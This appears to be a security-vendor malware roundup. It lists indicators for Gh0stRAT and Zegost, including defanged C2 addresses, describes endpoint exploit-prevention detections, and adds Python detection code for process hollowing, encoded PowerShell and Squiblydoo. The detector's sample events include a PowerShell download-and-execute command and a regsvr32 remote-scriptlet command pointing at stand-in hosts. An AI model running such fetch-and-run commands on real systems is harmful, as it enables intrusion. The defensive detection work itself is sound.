MITRE ATT&CK


Win.Malware.Gh0stRAT-9839666-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 32 samples
Registry Keys | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ
Value Name: Description
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ
Value Name: Type
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ
Value Name: Start
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ
Value Name: DisplayName
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ
Value Name: WOW64
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ
Value Name: ObjectName
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO
Value Name: Description
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ
Value Name: FailureActions
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO
Value Name: Type
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO
Value Name: Start
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO
Value Name: DisplayName
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO
Value Name: WOW64
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO
Value Name: ObjectName
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO
Value Name: FailureActions
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ
Value Name: ErrorControl
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ 5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO 5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO
Value Name: ErrorControl
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO
Value Name: ImagePath
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ
Value Name: ImagePath
5
Mutexes | Occurrences
<original file dir>\<original file name>.exe 29
DirectX jrq 5
DirectX ufo 5
C:\Windows\micioe.exe 4
127.0.0.1 3
58.218.199.225 2
C:\Windows\xgvzmq.exe 2
C:\Windows\eaayga.exe 2
116.211.144.180 2
C:\Windows\tchhio.exe 2
116.211.144.17 2
103.21.117.143 1
47.95.233.18 1
zhangshuaihua.tl-ip.com 1
114.67.236.148 1
218.2.0.185 1
47.93.52.188 1
111.230.129.192 1
asd5211.f3322.net 1
103.76.87.13 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
103[.]21[.]117[.]143 2
67[.]195[.]204[.]75 2
58[.]218[.]199[.]225 2
116[.]211[.]144[.]180 2
116[.]211[.]144[.]17 2
104[.]47[.]37[.]33 1
117[.]46[.]5[.]71 1
209[.]85[.]233[.]27 1
123[.]249[.]9[.]151 1
67[.]195[.]204[.]77 1
104[.]47[.]56[.]161 1
98[.]136[.]96[.]77 1
104[.]47[.]58[.]33 1
104[.]47[.]18[.]97 1
217[.]172[.]179[.]54 1
130[.]0[.]232[.]208 1
47[.]95[.]233[.]18 1
114[.]67[.]236[.]148 1
218[.]2[.]0[.]185 1
47[.]93[.]52[.]188 1
111[.]230[.]129[.]192 1
103[.]76[.]87[.]13 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
zhangshuaihua[.]tl-ip[.]com 1
asd5211[.]f3322[.]net 1
Files and/or directories created | Occurrences
%SystemRoot%\micioe.exe 4
%SystemRoot%\xgvzmq.exe 2
%SystemRoot%\eaayga.exe 2
%SystemRoot%\tchhio.exe 2
%SystemRoot%\zmdpmg.exe 1
%SystemRoot%\iickie.exe 1
%SystemRoot%\lytrym.exe 1
%SystemRoot%\pchjco.exe 1
%SystemRoot%\tgvbgq.exe 1
%SystemRoot%\uusmuk.exe 1
%SystemRoot%\jwzvwy.exe 1
%SystemRoot%\wwmiwy.exe 1
%SystemRoot%\ookyou.exe 1
%SystemRoot%\qqeuqi.exe 1

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Zegost-9840060-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 38 samples
Registry Keys | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
34
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
34
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
34
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
34
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
34
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
34
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
32
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: ConsentPromptBehaviorAdmin
32
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: PromptOnSecureDesktop
32
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\WINDOWS ERROR REPORTING\DEBUG 32
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BEEP
Value Name: BEEP
32
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BEEP
Value Name: ErrorService
32
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BEEP
Value Name: svcname
32
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\WINDOWS ERROR REPORTING\DEBUG
Value Name: StoreLocation
32
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ConnectGroup
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WRAKPTIT\PARAMETERS 6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SVCHOST
Value Name: WRAKPTIT
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WRAKPTIT\PARAMETERS
Value Name: ServiceDll
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DFFUFH34\PARAMETERS 6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SVCHOST
Value Name: dffUFh34
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DFFUFH34\PARAMETERS
Value Name: ServiceDll
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ALZR9LUL\PARAMETERS 5
Mutexes | Occurrences
Global\<random guid> 38
Global\KFIStart Menu 32
\x47\x6c\x6f\x62\x61\x6c\x5c\xb850\x1d5 3
DTyREj8NE5dsEjETmOgT7jNpETEZ/m== 2
y6ZTCKtSEjEPDidsEjETmOgT7jNNEQi= 2
86IRDTISDKVTE5cguP/5w5c17ftqETlRDHi= 2
7+<, = x& $ 2
7+<, = x& $ 2
\x47\x6c\x6f\x62\x61\x6c\x5c\xb850\x1c3 2
\x47\x6c\x6f\x62\x61\x6c\x5c\xb850\x1dd 2
86EOCKtsDjVpE5dsEjETmOgT7jNQDKZS/m== 2
Deo17zvMmTIsETE1u-DgCTVRDKkh 2
\x47\x6c\x6f\x62\x61\x6c\x5c\xb850\x1c6 2
x-7Zveo19FY5mTIsETE1u-DgCTVZBHi= 1
yfANCKtpE6tSDjV1EjITESc2yOhqC6lZD/i= 1
wPVpDjysEjZ1EjITESc2yOhqETlRDgi= 1
wTtNCKyZDjZQEidsEjETmOgT7jNSETDh 1
xODP8TATE6E1BKVPDSc2yOhqBKHh 1
86VTDKtODjysmO/1xzopmOcewKNTDKlS/m== 1
86tODK8TDThZEidsEjETmOgT7jNPDjVs/m== 1
8zQ0DTlpE6ZZDTysmO2eveDOmOH2u6NZDKlS/m== 1
wFY5uOsawFg17jlRE5dsEjETmOgT7jNZDKlR/m== 1
EjATDjVpDTZSmTIsETE1u-DgCTVRDKoh 1
DTEOD6yZDTVRmTIsETE1u-DgCT8OD67h 1
\x47\x6c\x6f\x62\x61\x6c\x5c\xb850\x1b9 1

*See JSON for more IOCs

IP Addresses contacted by malware. Does not indicate maliciousness    Occurrences
59[.]42[.]71[.]178 5
157[.]122[.]62[.]205 2
14[.]210[.]109[.]122 2
61[.]146[.]33[.]131 2
183[.]236[.]2[.]18 1
77[.]4[.]7[.]92 1
189[.]163[.]17[.]5 1
54[.]76[.]135[.]1 1
118[.]5[.]49[.]6 1
188[.]5[.]4[.]96 1
20[.]210[.]205[.]20 1
49[.]2[.]123[.]56 1
219[.]132[.]66[.]42 1
219[.]132[.]73[.]67 1
14[.]210[.]91[.]15 1
219[.]132[.]66[.]14 1
183[.]44[.]163[.]231 1
219[.]129[.]65[.]115 1
113[.]103[.]214[.]31 1
14[.]210[.]50[.]189 1
113[.]86[.]242[.]5 1
Domain Names contacted by malware. Does not indicate maliciousness    Occurrences
6603541[.]3322[.]org 2
a306310821[.]gnway[.]net 2
q924413267[.]3322[.]org 2
a254437891[.]3322[.]org 2
5angel[.]3322[.]org 2
wuxianxia[.]3322[.]org 1
z444687973[.]3322[.]org 1
vbvb1212[.]8866[.]org 1
a82045763[.]gnway[.]net 1
a450526783[.]3322[.]org 1
ckm609198663[.]meibu[.]com 1
tianditong001[.]3322[.]org 1
312789691[.]3322[.]org 1
625568680[.]3322[.]org 1
zx976339[.]3322[.]org 1
qq444914178[.]3322[.]org 1
6862082[.]3322[.]org 1
z954985733[.]3322[.]org 1
jinbizi[.]gicp[.]net 1
792143545[.]3322[.]org 1
q362375754[.]3322[.]org 1
qq849181440[.]3322[.]org 1
a846578461[.]gicp[.]net 1
win226[.]8866[.]org 1
wsqadr[.]3322[.]org 1

*See JSON for more IOCs

Files and/or directories created    Occurrences
%ProgramFiles(x86)%\MSN 38
%SystemRoot%\SysWOW64\systemwin.log 38
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Local\CrashDumps 32
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu 32
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini 32
\TEMP\346adqw.not 32
%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp 15
%TEMP%\~PI<random, matching [A-F0-9]{2,4}>.tmp 10
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Local\CrashDumps\svchost.exe.1784.dmp 7
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Local\CrashDumps\svchost.exe.1488.dmp 7
%TEMP%\9726.tmp 6
%TEMP%\9550.tmp 6
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Local\CrashDumps\svchost.exe.788.dmp 6
%TEMP%\9594.tmp 5
%TEMP%\23136.tmp 5
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Local\CrashDumps\svchost.exe.624.dmp 3
%TEMP%\19869.tmp 3
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Local\CrashDumps\svchost.exe.1448.dmp 3
%TEMP%\24017.tmp 3
%SystemRoot%\Temp\WER2CE9.tmp.WERInternalMetadata.xml 2
%TEMP%\20671.tmp 2
%TEMP%\16788.tmp 2
%SystemRoot%\Temp\WER54D5.tmp.mdmp 2
%SystemRoot%\Temp\WER3C63.tmp.WERInternalMetadata.xml 2
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Local\CrashDumps\svchost.exe.732.dmp 2

*See JSON for more IOCs

File Hashes
*See JSON for more IOCs

Coverage

Product    Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


Malware


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (15672)
Process hollowing is a technique used by some programs to evade static analysis and to run their code under the name of a legitimate process. In typical usage, the loader unpacks its obfuscated or encrypted payload into memory, starts a legitimate child process in a suspended state, unmaps (hollows out) the child's original executable image, writes the unpacked payload into the child's address space, and then resumes the child so that the payload executes inside what appears to be a legitimate process.
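One classic way to spot the hollowing described above is to compare the PE header found at a process's in-memory image base with the header of the file the process claims to be running: after the original image has been unmapped and replaced, the entry point and section table no longer match. The following is an added example, not code from the Talos roundup or from Cisco AMP; the two headers it compares are constructed, minimal PE headers built inside the script, and in practice the memory side would be read from the live process or a memory image and the disk side from the mapped file.

```python
"""Added example (not part of the Talos roundup): a header-comparison heuristic
for process hollowing.  The PE buffers below are constructed for the demo."""
import struct
from dataclasses import dataclass


@dataclass(frozen=True)
class PeSummary:
    machine: int
    entry_point: int          # AddressOfEntryPoint (RVA)
    image_base: int           # ImageBase field of the optional header
    sections: tuple           # ((name, VirtualAddress, VirtualSize), ...)


def parse_pe(buf: bytes) -> PeSummary:
    """Parse just enough of a PE header to fingerprint the image."""
    if buf[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", buf, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", buf, opt)[0]
    entry = struct.unpack_from("<I", buf, opt + 16)[0]
    if magic == 0x10B:                                    # PE32
        image_base = struct.unpack_from("<I", buf, opt + 28)[0]
    elif magic == 0x20B:                                  # PE32+
        image_base = struct.unpack_from("<Q", buf, opt + 24)[0]
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    first_section = opt + opt_size
    sections = []
    for i in range(nsect):
        off = first_section + 40 * i                      # IMAGE_SECTION_HEADER is 40 bytes
        name = buf[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr = struct.unpack_from("<II", buf, off + 8)
        sections.append((name, vaddr, vsize))
    return PeSummary(machine, entry, image_base, tuple(sections))


def hollowing_indicators(disk: bytes, memory: bytes) -> list:
    """Differences between on-disk and in-memory headers; an empty list means they agree."""
    d, m = parse_pe(disk), parse_pe(memory)
    findings = []
    if d.machine != m.machine:
        findings.append(f"machine: disk {d.machine:#x}, memory {m.machine:#x}")
    if d.entry_point != m.entry_point:
        findings.append(f"entry point: disk {d.entry_point:#x}, memory {m.entry_point:#x}")
    # Caveat: the ImageBase field of a relocated (ASLR) image may legitimately differ
    # depending on the loader, so treat it as a weaker signal than the other two.
    if d.image_base != m.image_base:
        findings.append(f"image base: disk {d.image_base:#x}, memory {m.image_base:#x}")
    if d.sections != m.sections:
        findings.append(f"section table: disk {d.sections}, memory {m.sections}")
    return findings


def build_pe(entry: int, image_base: int, sections, pe32plus: bool = True) -> bytes:
    """Construct a minimal, non-runnable PE header for the demonstration (assumed layout)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 112 if pe32plus else 96                    # optional header without data directories
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C,
                       len(sections), 0, 0, 0, opt_size, 0x22)
    std = struct.pack("<HBBIIII", 0x20B if pe32plus else 0x10B, 14, 0, 0, 0, 0, entry)
    if pe32plus:
        std += struct.pack("<IQ", 0x1000, image_base)               # BaseOfCode, ImageBase
    else:
        std += struct.pack("<III", 0x1000, 0x2000, image_base)      # BaseOfCode, BaseOfData, ImageBase
    opt = std.ljust(opt_size, b"\0")
    table = b"".join(name.encode("ascii").ljust(8, b"\0") + struct.pack("<II", vsize, vaddr)
                     + b"\0" * 24 for name, vaddr, vsize in sections)
    return dos + b"PE\0\0" + coff + opt + table


# Constructed samples: the image as it exists on disk, the same header read back from a
# clean process, and a header read from a process whose image was replaced by a payload.
DISK_IMAGE = build_pe(0x1A40, 0x140000000,
                      ((".text", 0x1000, 0x8000), (".rdata", 0x9000, 0x3000), (".data", 0xC000, 0x800)))
CLEAN_MEMORY = DISK_IMAGE
HOLLOWED_MEMORY = build_pe(0x2F10, 0x400000, ((".text", 0x1000, 0x12000), (".rsrc", 0x13000, 0x400)))

if __name__ == "__main__":
    print("clean:   ", hollowing_indicators(DISK_IMAGE, CLEAN_MEMORY))
    print("hollowed:", hollowing_indicators(DISK_IMAGE, HOLLOWED_MEMORY))
```

The entry point and section table are the strong signals here; a payload written over a hollowed svchost.exe almost never reproduces the original layout, whereas the ImageBase field alone can differ for benign reasons and should be confirmed against the process's PEB or VAD before it is reported.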
Crystalbit-Apple DLL double hijack detected - (2153)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a DLL double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and, in some cases, spyware deployment.
Excessively long PowerShell command detected - (1542)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language installed by default on all supported versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
A Microsoft Office process has started a windows utility. - (964)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many different malware campaigns and families.
Kovter injection detected - (961)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Squiblydoo application whitelist bypass attempt detected. - (663)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content (a COM scriptlet loaded through scrobj.dll) hosted on an attacker-controlled server, so the signed Microsoft binary does the fetching and execution rather than an unapproved executable.
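The three process-creation behaviours above (an excessively long or encoded PowerShell command line, an Office process spawning a Windows utility, and a regsvr32.exe Squiblydoo invocation) can all be expressed as rules over the same telemetry. The block below is an added example, not code from the roundup or from Cisco AMP: it runs those rules over constructed records in the shape of Sysmon Event ID 1 (ParentImage, Image, CommandLine) exported as JSON lines, and decodes any -EncodedCommand payload so the analyst sees what the command actually does. The length threshold, the binary lists and every sample command line are assumptions made for the demo; hostnames use the reserved .invalid TLD.

```python
"""Added example (not part of the Talos roundup): rule-based detection for
long/encoded PowerShell, Office-spawned utilities and Squiblydoo over
constructed Sysmon-style process-creation records."""
import base64
import binascii
import json
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
WINDOWS_UTILITIES = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                     "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe"}
LONG_POWERSHELL = 1000            # assumed threshold (characters) for "excessively long"

# -e / -ec / -enc / ... / -EncodedCommand followed by a base64 blob.  PowerShell accepts
# any unambiguous prefix of the parameter name, so the prefix itself is checked in code.
ENCODED_RE = re.compile(r"(?<!\S)-e([a-z]*)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
# regsvr32 ... /i:<url> ... scrobj.dll is the Squiblydoo shape: the scriptlet is fetched remotely.
SQUIBLYDOO_RE = re.compile(r"/i:\s*(https?://\S+)", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (UTF-16LE), or None if there is none."""
    for flag, blob in ENCODED_RE.findall(cmdline):
        if not "encodedcommand".startswith("e" + flag.lower()):
            continue                  # e.g. -ExecutionPolicy is not an encoded command
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return None
    return None


def evaluate(event: dict) -> list:
    """Apply the three rules to one process-creation record and return the hits."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    hits = []
    if parent in OFFICE_APPS and image in WINDOWS_UTILITIES:
        hits.append(f"office-spawned-utility: {parent} -> {image}")
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmdline)
        if len(cmdline) > LONG_POWERSHELL or decoded is not None:
            detail = f"length={len(cmdline)}"
            if decoded is not None:
                detail += f" decoded={decoded[:60]!r}"
            hits.append("long-or-encoded-powershell: " + detail)
    if image == "regsvr32.exe":
        m = SQUIBLYDOO_RE.search(cmdline)
        if m:
            hits.append("squiblydoo-regsvr32: remote scriptlet " + m.group(1))
    return hits


def scan(json_lines: str) -> dict:
    """Map record index -> hits for every record that triggers at least one rule."""
    findings = {}
    for i, line in enumerate(l for l in json_lines.splitlines() if l.strip()):
        hits = evaluate(json.loads(line))
        if hits:
            findings[i] = hits
    return findings


# Constructed sample records (not real telemetry).
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c start invoice.hta"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -c \"$x='" + "A" * 1200 + "';IEX $x\""},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://example.invalid/update.sct scrobj.dll"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits)
```

Records 1 to 4 fire (the Word-spawned PowerShell fires twice, once for the parent/child pair and once for the encoded payload), while the benign Notepad launch and the short, unencoded backup script do not. In production the parent/child rule is the one that needs the least tuning; the length threshold should be set from your own baseline of legitimate long command lines, and -EncodedCommand alone is a strong enough signal to alert on regardless of length.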
Dealply adware detected - (156)
DealPly is adware that claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements into web pages. Adware has also been known to download and install malware.
Gamarue malware detected - (96)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
CVE-2019-0708 detected - (91)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Houdini/HWORM detected - (38)
Houdini/HWORM detected. This worm uses an obfuscated VBScript to drop additional malware such as njRAT.